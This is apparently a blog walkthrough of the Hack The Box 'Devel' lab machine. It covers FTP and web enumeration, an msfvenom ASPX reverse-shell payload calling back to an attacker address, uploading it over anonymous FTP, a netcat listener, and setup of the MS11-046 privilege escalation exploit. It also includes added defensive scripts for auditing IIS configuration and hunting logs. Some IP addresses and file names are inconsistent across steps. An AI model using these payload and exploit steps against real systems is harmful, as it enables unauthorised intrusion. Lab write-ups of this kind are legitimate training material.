Hi hackers, welcome back. Today we are going to look at the Hack The Box Devel machine.
Info Table
Title: Devel
Category: Hack The Box
OS: Windows
Difficulty: Easy
Maker:
Kill Chain Summary
While enumerating ports and services we find a service that is vulnerable to MS11-046, which can be easily exploited with publicly available scripts and Metasploit.
┌─[atom@atom-vmwarevirtualplatform]─[~]
└──╼ $ gobuster dir -u http://10.10.10.5 --wordlist /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.5
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/06/17 07:09:44 Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client        (Status: 301) [Size: 155] [--> http://10.10.10.5/aspnet_client/]
===============================================================
2022/06/17 07:12:12 Finished
===============================================================
The gobuster result shows a hidden directory; when we browse to it, the server answers Access denied.
FTP Enumeration
While enumerating FTP, Nmap reports that anonymous login is allowed:
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/devil]
└──╼ $ ftp 10.129.102.193
Connected to 10.129.102.193.
220 Microsoft FTP Service
Name (10.129.102.193:atom): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
We can see three entries: aspnet_client, iisstart.htm and welcome.png. The aspnet_client directory looks familiar because the same directory name appeared in the gobuster result, so let's go to the web page and view its source code.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS7</title>
<style type="text/css">
<!--
body { color:#000000; background-color:#B3B3B3; margin:0; }
#container { margin-left:auto; margin-right:auto; text-align:center; }
a img { border:none; }
-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
</html>
Exploiting
In the source code we find the welcome.png image, which is the same image located on the FTP server, so it is clear that the IIS server is hosted from the FTP shared directory. We are already logged in to FTP as the anonymous user, so any file we add to the FTP directory is reflected on the web server.
So let's write a reverse shell payload in ASPX format and put it into the FTP directory. We create it in ASPX format because we have already identified the web technology (IIS).
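The root cause described here is a configuration problem rather than a software bug: an FTP site that grants anonymous users Write on a directory that IIS also serves over HTTP. The following audit script is an added example written for this post, not code from the original write-up or from Microsoft. It parses a constructed fragment in the shape of IIS 7.x applicationHost.config (site name, paths and bindings are assumptions) and flags any FTP site where anonymous authentication is enabled, an authorization rule grants Write to anonymous (`?`) or all users (`*`), and the FTP root overlaps a directory with an http/https binding. The corrected configuration (Read only for anonymous) is shown beside the weak one so the same check reports nothing for it.

```python
"""Audit an IIS applicationHost.config for the weakness shown above: an FTP
site whose anonymous users may write into a directory that IIS also serves
over HTTP, so an uploaded .aspx file is executed as server-side code."""
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

# Constructed configuration fragment shaped like IIS 7.x applicationHost.config.
# Site name, paths and bindings are assumptions for this example, not values
# recovered from the Devel machine.
WEAK_CONFIG = """<configuration>
  <system.applicationHost>
    <sites>
      <site name="Default Web Site" id="1">
        <application path="/">
          <virtualDirectory path="/" physicalPath="C:\\inetpub\\wwwroot" />
        </application>
        <bindings>
          <binding protocol="http" bindingInformation="*:80:" />
          <binding protocol="ftp" bindingInformation="*:21:" />
        </bindings>
        <ftpServer>
          <security>
            <authentication>
              <anonymousAuthentication enabled="true" />
            </authentication>
          </security>
        </ftpServer>
      </site>
    </sites>
  </system.applicationHost>
  <location path="Default Web Site">
    <system.ftpServer>
      <security>
        <authorization>
          <add accessType="Allow" users="?" permissions="Read, Write" />
        </authorization>
      </security>
    </system.ftpServer>
  </location>
</configuration>
"""

# The corrected setting: anonymous FTP users keep Read only, Write is removed.
FIXED_CONFIG = WEAK_CONFIG.replace('permissions="Read, Write"', 'permissions="Read"')


def _bindings(site):
    return {b.get("protocol", "").lower() for b in site.iter("binding")}


def _physical_paths(site):
    return {PureWindowsPath(v.get("physicalPath"))
            for v in site.iter("virtualDirectory") if v.get("physicalPath")}


def _anonymous_ftp_enabled(site):
    node = site.find("ftpServer/security/authentication/anonymousAuthentication")
    return node is not None and node.get("enabled", "false").lower() == "true"


def _anonymous_write_grants(root, site_name):
    """FTP authorization rules for site_name that grant Write to anonymous
    ('?') or to all users ('*'), the IIS FTP rule syntax for those groups."""
    grants = []
    for loc in root.iter("location"):
        if loc.get("path") != site_name:
            continue
        for auth in loc.iter("authorization"):
            for rule in auth.findall("add"):
                perms = {p.strip().lower() for p in rule.get("permissions", "").split(",")}
                if (rule.get("accessType") == "Allow" and "write" in perms
                        and rule.get("users") in ("?", "*")):
                    grants.append(rule.get("users"))
    return grants


def _overlaps(a, b):
    """True when one directory is the other or lies inside it (case-insensitive, as on NTFS)."""
    return a == b or a in b.parents or b in a.parents


def audit(config_xml):
    """Return one finding per FTP site whose anonymous users can write into a
    directory that is also served over HTTP/HTTPS."""
    root = ET.fromstring(config_xml)
    sites = list(root.iter("site"))
    web_roots = [(p, s.get("name")) for s in sites
                 if _bindings(s) & {"http", "https"} for p in _physical_paths(s)]
    findings = []
    for s in sites:
        if "ftp" not in _bindings(s) or not _anonymous_ftp_enabled(s):
            continue
        grants = _anonymous_write_grants(root, s.get("name"))
        if not grants:
            continue
        for ftp_root in _physical_paths(s):
            for web_root, web_site in web_roots:
                if _overlaps(ftp_root, web_root):
                    findings.append({"ftp_site": s.get("name"), "ftp_root": str(ftp_root),
                                     "web_site": web_site, "web_root": str(web_root),
                                     "anonymous_write_rules": grants})
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("fixed", FIXED_CONFIG)):
        print(label, audit(cfg))
```

The overlap test deliberately flags both directions (FTP root inside the web root, or web root inside the FTP root), because an anonymous writer in either layout can place a file where IIS will execute it.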
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/devil]
└──╼ $ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.5 LPORT=8989 -o wrs2.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2720 bytes
Saved as: wrs2.aspx
Put the payload into the web server directory, which is the FTP directory:
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/devil]
└──╼ $ ftp 10.129.102.193
Connected to 10.129.102.193.
220 Microsoft FTP Service
Name (10.129.102.193:atom): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put wrs2.aspx
local: wrs2.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
38146 bytes sent in 0.00 secs (42.4987 MB/s)
ftp>
Initial Foothold
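From the defender's side, the two steps above leave a distinctive trail: a successful FTP STOR of a file with a server-side extension, followed by an HTTP request for the same path. The script below is an added example (not part of the original write-up) that reads both IIS FTP and IIS web logs in W3C extended format, taking the column order from each file's `#Fields:` header rather than assuming it. The sample log lines are constructed for the example; the field layouts follow the IIS 7.5 defaults and the IP addresses, timestamps and session id are made up. It flags successful uploads of executable web content and then correlates each one with later requests for that path, so a 200 on the second step means the uploaded page ran, not merely that it was stored.

```python
"""Hunt for the upload-then-execute pattern from this write-up in IIS logs:
an FTP STOR of a server-side file extension, then an HTTP request for the
same path. Both inputs are W3C extended logs, so the parser reads the
'#Fields:' header instead of assuming a column order."""
from datetime import datetime
from pathlib import PurePosixPath

# Constructed sample logs (field order as in the IIS 7.5 FTP and web defaults;
# addresses, times and the session id are invented for this example).
FTP_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2022-06-17 07:20:01 10.10.14.5 - 10.10.10.5 21 USER anonymous 331 0 0 1a2b3c4d -
2022-06-17 07:20:01 10.10.14.5 anonymous 10.10.10.5 21 PASS *** 230 0 0 1a2b3c4d /
2022-06-17 07:20:05 10.10.14.5 anonymous 10.10.10.5 21 STOR wrs2.aspx 226 0 0 1a2b3c4d /wrs2.aspx
2022-06-17 07:20:09 10.10.14.5 anonymous 10.10.10.5 21 STOR notes.txt 226 0 0 1a2b3c4d /notes.txt
2022-06-17 07:20:12 10.10.14.5 anonymous 10.10.10.5 21 STOR cmd.aspx 550 5 0 1a2b3c4d /cmd.aspx
"""

WEB_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2022-06-17 07:19:50 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.5 Mozilla/5.0+(X11;+Linux+x86_64) 200 0 0 3
2022-06-17 07:21:30 10.10.10.5 GET /wrs2.aspx - 80 - 10.10.14.5 Mozilla/5.0+(X11;+Linux+x86_64) 200 0 0 1540
"""

# Extensions IIS hands to a script engine or handler rather than serving as static content.
SERVER_SIDE_EXT = {".asp", ".aspx", ".ashx", ".asmx", ".asax", ".config", ".dll", ".exe"}
WRITE_METHODS = {"STOR", "APPE", "RNTO"}   # upload, append, rename-to


def parse_w3c(text):
    """Return one dict per data line, keyed by the names in the '#Fields:' header."""
    fields, rows = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or (line.startswith("#") and not line.startswith("#Fields:")):
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if fields is None:
            raise ValueError("data line before #Fields: header")
        values = line.split(" ")
        if len(values) != len(fields):   # W3C values never contain spaces; skip torn lines
            continue
        rows.append(dict(zip(fields, values)))
    return rows


def _ts(row):
    return datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")


def suspicious_uploads(ftp_rows):
    """Successful FTP writes (2xx reply) of files IIS would execute."""
    hits = []
    for r in ftp_rows:
        if r.get("cs-method") not in WRITE_METHODS or not r.get("sc-status", "").startswith("2"):
            continue
        full = r.get("x-fullpath")
        path = full if full not in (None, "-") else "/" + r.get("cs-uri-stem", "")
        if PurePosixPath(path).suffix.lower() in SERVER_SIDE_EXT:
            hits.append({"when": _ts(r), "client": r["c-ip"], "user": r["cs-username"],
                         "path": path, "anonymous": r["cs-username"].lower() in ("anonymous", "ftp")})
    return hits


def correlate(hits, web_rows):
    """Pair each flagged upload with later HTTP requests for the same path."""
    alerts = []
    for h in hits:
        for w in web_rows:
            if _ts(w) >= h["when"] and w.get("cs-uri-stem", "").lower() == h["path"].lower():
                alerts.append({**h, "requested_by": w["c-ip"], "requested_at": _ts(w),
                               "http_status": w["sc-status"]})
    return alerts


if __name__ == "__main__":
    found = suspicious_uploads(parse_w3c(FTP_LOG))
    for a in correlate(found, parse_w3c(WEB_LOG)):
        print(f"{a['when']} {a['user']}@{a['client']} uploaded {a['path']}; "
              f"requested by {a['requested_by']} at {a['requested_at']} -> HTTP {a['http_status']}")
```

Note the two edge cases in the sample: the text file upload is ignored because IIS serves it statically, and the failed STOR (550) is ignored because nothing was written. Only the successful .aspx upload survives, and only because a later GET for the same path exists does it become an alert.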
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/devil]
└──╼ $ nc -lvnp 8989
listening on [any] 8989 ...
connect to [10.10.14.2] from (UNKNOWN) [10.129.96.188] 49160
whoami
iis apppool\web
PS C:\windows\system32\inetsrv>
Privilege Escalation
We have an initial foothold, but only as a low-privilege user. To escalate to a higher privilege we use the winPEAS.bat file, hosted on the attacker machine with the Python 3 web server command.
Using the information from winPEAS, let's google the findings; we can see several exploits. Let's use the first one, which targets afd.sys.
Opening the exploit page, we can see the exploit steps and the EDB-ID, which is the searchsploit ID.
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the invoking shell/process
# Exploit compiling (Kali GNU/Linux Rolling 64-bit):
# - # i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32
# Exploit prerequisites:
# - low privilege access to the target OS
# - target OS not patched (KB2503665, or any other related
# patch, if applicable, not installed - check "Related security
# vulnerabilities/patches")
# Exploit test notes:
# - let the target OS boot properly (if applicable)
# - Windows 7 (SP0 and SP1) will BSOD on shutdown/reset
################################################################
Update searchsploit to ensure you have all the latest vulnerabilities.
searchsploit -u
Use the -m flag to look for the exploit 40564 and copy it to the current directory.
searchsploit -m 40564
Compile the payload and convert it to .exe format
If you don't have mingw-w64 installed, install it.